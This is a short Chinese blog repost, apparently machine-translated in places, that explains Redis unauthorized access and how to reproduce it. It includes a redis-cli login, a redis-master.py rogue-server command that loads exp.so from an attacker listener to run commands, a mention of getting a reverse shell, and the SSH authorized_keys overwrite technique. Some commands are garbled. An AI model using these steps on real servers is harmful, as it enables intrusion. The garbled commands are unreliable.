redis未授权

技术redis未授权 redis未授权Redis服务简介
Redis(Remote Dictionary Server ),即远程字典服务,是一个开源的使用ANSI C语言编写、支持网络、可基于内存亦可

Redis未经授权

Redis服务简介

Redis(Remote Dictionary Server),即远程字典服务,是用ANSI C语言编写的开源日志型、键值型数据库,支持网络,可以基于内存持久化,提供多种语言的API。

Redis完全开源,符合BSD协议,是一个高性能的键值数据库。

Redis和其他键值缓存产品具有以下三个特征:

Redis支持数据持久化,可以将内存中的数据保存在磁盘中,重启时再次加载使用。

Redis不仅支持简单的键值数据,还提供列表、集合、zset和hash等数据结构的存储。

Redis支持数据备份,即主从模式的数据备份。

redis的默认开放端口是6379。

漏洞复现

您可以直接登录redis服务器。

redis-cli -h 192.168.186.1

未经授权的redis可以由poc直接访问。

pyt 3 redis-master . py-r 192 . 168 . 186 . 1-P 6379-L 192 . 168 . 186 . 2-P 8888-f redis modulesDk/exp . so-c ‘ id ‘

也可以使用exp直接获取外壳。

反弹壳建立链接

漏洞成因

1)redis绑定0.0.0.0:6379,没有添加防火墙规则等相关安全策略,避免来自其他不可信来源的ip访问,直接暴露在公网;

2)未设置密码认证(一般为空),无需密码即可远程登录redis服务。

默认情况下,redis将绑定到0.0.0.0:6379。如果不采用相关策略,如增加防火墙规则,避免来自其他不可信来源的ip访问,则如果不设置密码认证(一般为空),Redis服务将暴露给公网。

如果任何用户可以访问目标服务器,将导致他未经授权访问Redis并读取Redis的数据。在未经授权对Redis进行质询的情况下,攻击者可以使用Redis本身提供的config命令编写文件,攻击者可以成功发送自己的ssh。

将公钥写入/root/中的authotrized _ keys文件。目标服务器的ssh文件夹,然后使用私钥直接使用ssh服务登录到目标服务器。

参考文章

https://www.cnblogs.com/bmjoker/p/9548962.html

内容来源网络,如有侵权,联系删除,本文地址:https://www.230890.com/zhan/77297.html

(0)

相关推荐

  • oracle数据库安装前需要如何配置环境

    技术oracle数据库安装前需要如何配置环境小编给大家分享一下oracle数据库安装前需要如何配置环境,希望大家阅读完这篇文章之后都有所收获,下面让我们一起去探讨吧!系统版本redhat5.6一 安装前环境配置查看内存g

    攻略 2021年11月18日
  • jquery如何使得div消失

    技术jquery如何使得div消失这篇文章主要讲解了“jquery如何使得div消失”,文中的讲解内容简单清晰,易于学习与理解,下面请大家跟着小编的思路慢慢深入,一起来研究和学习“jquery如何使得div消失”吧!

    攻略 2021年11月17日
  • iOS中NSPredicate谓词的使用方法是什么

    技术iOS中NSPredicate谓词的使用方法是什么本篇内容介绍了“iOS中NSPredicate谓词的使用方法是什么”的有关知识,在实际案例的操作过程中,不少人都会遇到这样的困境,接下来就让小编带领大家学习一下如何处

    攻略 2021年11月4日
  • VC++ win7下怎么实现WIFI共享工具

    技术VC++ win7下怎么实现WIFI共享工具这篇文章主要讲解了“ VC++ win7下怎么实现WIFI共享工具”,文中的讲解内容简单清晰,易于学习与理解,下面请大家跟着小编的思路慢慢深入,一起来研究和学习“ VC++

    攻略 2021年11月30日
  • 交易所eos节点(如何在eos钱包充值到交易所)

    技术交易所通过eosjs进行充值与转账的代码片段是怎样的交易所通过eosjs进行充值与转账的代码片段是怎样的,很多新手对此不是很清楚,为了帮助大家解决这个难题,下面小编将为大家详细讲解,有这方面需求的人可以来学习下,希望

    攻略 2021年12月14日
  • OsgEarth开发笔记,四):Qt5.15.2在QtCreator集成Osg3.6.3+OsgEarth3.1+OsgQt的vs2019x64版本开发环境搭建

    技术OsgEarth开发笔记,四):Qt5.15.2在QtCreator集成Osg3.6.3+OsgEarth3.1+OsgQt的vs2019x64版本开发环境搭建 OsgEarth开发笔记(四):Qt

    礼包 2021年12月24日